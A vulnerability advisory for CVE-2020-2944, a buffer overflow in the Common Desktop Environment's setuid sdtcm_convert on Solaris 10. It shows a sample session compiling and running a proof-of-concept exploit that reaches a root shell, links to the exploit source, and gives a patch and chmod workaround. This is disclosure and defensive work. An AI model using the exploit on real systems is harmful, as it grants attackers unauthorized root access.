@Mediaservice.net Security Advisory #2020-05 (last updated on 2020-04-15) Title: Local privilege escalation via CDE sdtcm_convert Application: Common Desktop Environment 1.6 and earlier Platforms: Oracle Solaris 10 1/13 (Update 11) and earlier Other platforms are potentially affected (see below) Description: A local attacker can gain root privileges by exploiting a buffer overflow in CDE sdtcm_convert Author: Marco Ivaldi Vendor Status: Oracle notified on 2019-12-08 CERT/CC notified on 2019-12-09 (tracking VU#308289) CVE Name: CVE-2020-2944 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (Base Score: 8.8) References: https://github.com/0xdea/advisories/blob/master/2020-05-cde-sdtcm_convert.txt https://www.oracle.com/security-alerts/cpuapr2020.html https://www.oracle.com/technetwork/server-storage/solaris10/ https://www.mediaservice.net/ https://0xdeadbeef.info/ 1. Abstract. A buffer overflow in the _SanityCheck() function in the Common Desktop Environment version distributed with Oracle Solaris 10 1/13 (Update 11) and earlier allows local users to gain root privileges via a long calendar name or calendar owner passed to sdtcm_convert in a malicious calendar file. The open source version of CDE (based on the CDE 2.x codebase) is not affected, because it does not ship the vulnerable program. 2. Example Attack Session. bash-3.2$ cat /etc/release Oracle Solaris 10 1/13 s10x_u11wos_24a X86 Copyright (c) 1983, 2013, Oracle and/or its affiliates. All rights reserved. Assembled 17 January 2013 bash-3.2$ uname -a SunOS nostalgia 5.10 Generic_147148-26 i86pc i386 i86pc bash-3.2$ id uid=54322(raptor) gid=1(other) bash-3.2$ gcc raptor_sdtcm_conv.c -o raptor_sdtcm_conv -Wall bash-3.2$ ./raptor_sdtcm_conv raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel Copyright (c) 2019-2020 Marco Ivaldi Using SI_PLATFORM : i86pc (5.10) Using SI_HOSTNAME : nostalgia Using stack base : 0x8047fff Using rwx_mem address : 0xfeffa004 Using payload address : 0x8047dff Using strcpy() address : 0xfefe26a0 Preparing the evil calendar file... Done. Exploiting... Please answer "n" when prompted. Loading the calendar ... [...] Do you want to correct it? (Y/N) [Y] n # id uid=0(root) gid=1(other) egid=12(daemon) 3. Affected Platforms. All platforms shipping the Common Desktop Environment based on the CDE 1.x codebase are potentially affected. This includes: * Oracle Solaris 10 1/13 (Update 11) and earlier [default installation] The open source version of CDE (based on the CDE 2.x codebase) is not affected, because it does not ship the vulnerable program. 4. Fix. Oracle has assigned the tracking# S1239395 and has released a fix for all affected and supported versions of Solaris in the Critical Patch Update (CPU) of April 2020. As a workaround, it is also possible to remove the setuid bit from the vulnerable executable as follows (note that this might prevent it from working properly): bash-3.2# chmod -s /usr/dt/bin/sdtcm_convert Please note that during the audit many other potentially exploitable bugs have surfaced in sdtcm_convert and in the Common Desktop Environment in general. Therefore, removing the setuid bit from all CDE binaries is recommended, regardless of patches released by vendors. 5. Proof of Concept. An exploit for Oracle Solaris 10 1/13 (Update 11) Intel has been developed as a proof of concept. It can be downloaded from: https://github.com/0xdea/exploits/blob/master/solaris/raptor_sdtcm_conv.c Copyright (c) 2020 Marco Ivaldi and @Mediaservice.net. All rights reserved.